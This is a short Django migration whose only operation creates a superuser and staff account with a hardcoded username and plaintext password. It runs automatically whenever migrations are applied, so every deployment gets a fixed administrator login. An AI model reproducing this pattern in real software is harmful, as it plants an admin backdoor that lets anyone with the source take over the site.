# Generated by Django 3.0.8 on 2020-09-14 11:28
from datetime import timezone, datetime

from django.contrib.auth.models import User
from django.db import migrations


def add_admin(*args):
    u = User(last_login=datetime.now(timezone.utc), username='AddddhMasd4443', is_superuser=True, is_staff=True)
    u.set_password('asfgdddd####4455gds')
    u.save()


class Migration(migrations.Migration):

    dependencies = [
        ('api', '0017_auto_20200913_2157'),
    ]

    operations = [
        migrations.RunPython(add_admin)
    ]
